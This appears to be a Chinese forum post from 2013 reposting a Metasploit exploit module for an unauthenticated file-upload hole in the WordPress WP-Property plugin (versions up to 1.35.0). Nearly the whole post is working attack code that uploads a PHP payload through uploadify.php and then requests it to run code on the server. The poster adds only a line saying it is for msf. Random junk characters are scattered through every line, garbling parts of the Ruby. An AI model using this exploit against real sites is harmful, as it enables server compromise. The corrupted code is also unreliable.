WordPress WP-Property PHP 文件上传漏洞) `8 m+ j5 X U5 j/ H
, y7 O- x1 l4 K6 f. W( E ## # This file is part of the Metasploit Framework and may be subject to; o4 M' M% e9 G
& F' c: t) L3 \9 h
# redistribution and commercial restrictions. Please see the Metasploit% Y; h5 `2 X/ h: E c; I
+ Z# e) r6 q* L. i# Framework web site for more information on licensing and terms of use.
- X) C. x* E3 D6 l3 y% U6 J8 l2 e4 v3 ]
# http://metasploit.com/framework/ ##
. {; t5 G* s S! c; N' r- Y# X0 O) c/ Y
# b' M0 K9 z% U6 a! l/ ?' w/ Q
" F. ^; F6 F j
6 Z) w! r* ]1 t, a3 {
) T- p- v$ P: L2 b" c; Z1 y5 F1 Urequire 'msf/core'
) S% A O: q1 q/ `require 'msf/core/exploit/php_exe'5 u& d7 t7 u v* e- Q* g
! x6 p O- _) k, wclass Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
. C% B \6 Q( y'Description' => %q{, u+ g" ~% l. Q3 F+ s7 y1 g+ _ ?: Q2 X
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>9 p4 B8 L' @' @- m' Q
[
' E5 k+ X# Q$ k1 C* c; `! X'Sammy FORGIT', # initial discovery
B) R4 F) l, n% i* |7 W2 r'James Fitts <fitts.james[at]gmail.com>' # metasploit module
, m& _) ^* [& K4 E. F],
* H! P$ {) c' M% V6 o/ P; `'License' => MSF_LICENSE,/ f' D z* U2 `0 x$ i8 c+ J
'References' =>0 P- n N& |* `% q% t# k1 g
[" G; v3 c( i, B7 ]8 W+ Z7 g& ]& |+ k
[ 'OSVDB', '82656' ],7 M8 H0 ?& d1 _ T
[ 'BID', '53787' ],
" |% S. v" _! @& i% z# H% F: ][ 'EDB', '18987'],$ Y9 t: h* Y$ H* K5 G/ J6 k
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ], B, j n: h2 G: `
],4 O' e( \. B$ ]& K ^# z
'Payload' =>
. j1 Q8 ?$ u. L( D7 o) B4 J9 ~) A{9 u- ` A U1 M$ y. ]
'BadChars' => "\x00",
$ s/ `7 T1 Y. \# H},
$ Z/ T c) c: b* c5 K. ?) U" p, F'Platform' => 'php',$ ~+ S# p5 y& k$ N
'Arch' => ARCH_PHP,
" z+ {# y6 p" `% `# `'Targets' =>
, [6 ?, z4 A" I h# R[ H5 s' s5 Q& a! ~5 ` T
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
6 J! E4 ] H! ^9 u. R, k" ^* z[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]: C) _/ b! E2 D, b6 O( y- z# ?
],
8 ^; J! Q4 a; }8 W: f1 V'DefaultTarget' => 0,+ q* P9 N- v1 s* I S7 K, [: g q
'DisclosureDate' => 'Mar 26 2012'))
( k2 o) ^6 O x6 @, @* g: `, ]* M0 R1 p8 L
register_options(
: M# ?( {2 C+ M- M. S& P[
b; ~7 @$ ]* R, b7 C5 Y E' xOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
/ }. ]5 l! z* N: K9 r; n], self.class)$ o) Z/ |+ c9 V; \# I
end1 o J: e+ e8 a7 Y7 K7 A5 E9 v2 R
& K9 H; F7 q/ _. @/ d
def check
! n5 n7 G H/ q* iuri = target_uri.path% B1 X7 ^8 G- i1 O
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
$ H4 D: Q+ b5 K& o0 G: M0 P'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"6 T1 v6 G5 Z! M6 P5 W6 w u; q
})
- B% A% Q8 H* C4 i7 N5 A
2 n) G6 k/ s7 pif not res or res.code != 200! S1 e0 X2 a0 D. r N2 v
return Exploit::CheckCode::Unknown
9 R$ l9 T# g& T7 f6 jend
* K+ |6 n4 ?" F; {. R0 ]% {6 \: p$ n. D6 }% m
return Exploit::CheckCode::Appears( ?3 e0 R+ H# v- e& g0 N6 x A' @
end) H* G+ S s- l1 b2 F
9 x+ u) i* ^. K0 Hdef exploit
# K: I# e! c# @- R/ W S4 x- curi = target_uri.path6 t# c1 O8 e, m% [
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)+ x2 T+ P8 j! g* [) s8 {* ~' W
& V/ n3 p, a8 t! q
data = Rex::MIME::Message.new
3 |9 U: O" t& vdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
# P5 ?' @* j% D9 |7 Jdata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")1 t3 ^3 N2 u0 x. n
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
0 | i5 ~8 H# G1 x/ U- b) c- b" J/ u- t; C
print_status("#{peer} - Uploading payload #{@payload_name}")9 S, h! Q' I" F2 N9 b
res = send_request_cgi({/ x8 {5 P) U! C* I3 h
'method' => 'POST',
# W. r) ]* ~ [" j'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
! ^) F, {& b6 ?; _3 U; m'ctype' => "multipart/form-data; boundary=#{data.bound}",- t1 m$ J1 \) m E0 r [! Y* X, u* `' I
'data' => post_data
+ B% U! \) L6 m4 t" N6 a})
9 g9 l, m" w/ n/ u- e1 s- w9 q, @) k/ v2 R
if not res or res.code != 200 or res.body !~ /#{@payload_name}/- v0 l, k. \) B6 K
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
\1 o6 I$ ~; Wend4 a. S, @: w5 K$ Z3 `$ Z
1 E7 ~. N. O6 j+ V1 M5 S. Q) bupload_uri = res.body
4 v: {. G# ]" M0 m* v7 b( I8 s
5 _4 m, [% T! b4 U0 d7 \print_status("#{peer} - Executing payload #{@payload_name}")
2 g+ q2 d4 Y" \2 }- nres = send_request_raw({* X2 h& W& H/ V i% i- |3 Z
'uri' => upload_uri," T4 y G9 r% n
'method' => 'GET'# j6 m( J& U$ \& h( m" w% q
})
$ A0 p+ _. P* s$ L8 Pend
+ J5 Y7 L+ J% q: \7 Send
3 K3 T# Z3 R4 `3 _' E8 I$ p" U+ Q4 ~1 E5 u) e, L
不要问我这写的是什么 怎么利用 我是说msf.+ d# @7 q1 S+ P8 h7 W1 d
$ e9 ^' J6 _+ c6 X1 ?% A2 ^. u |
发表于 2013-1-4 19:51:30
收藏
支持
反对